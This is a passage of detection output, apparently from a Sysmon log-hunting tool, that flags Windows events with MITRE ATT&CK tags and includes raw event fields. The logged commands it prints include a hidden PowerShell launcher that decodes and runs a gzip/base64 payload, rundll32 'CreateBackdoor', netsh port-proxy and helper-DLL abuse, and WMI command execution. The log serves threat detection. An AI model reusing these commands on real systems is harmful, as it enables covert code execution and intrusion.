Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe + "c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to 
internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.470 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50008 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 49666 + + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4948 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.355 + 747F3D96-6646-5D3F-0000-001029398B00 + 6760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + 
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + 
C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include 
(powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + 
Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing 
Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589974 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.467 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50007 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 135 + epmap + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4947 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.336 + 747F3D96-6646-5D3F-0000-001051388B00 + 3824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh.exe add helper AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 
+ 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + 
MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured 
-Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4946 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.273 + 747F3D96-6646-5D3F-0000-0010A7318B00 + 4148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace show status + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + 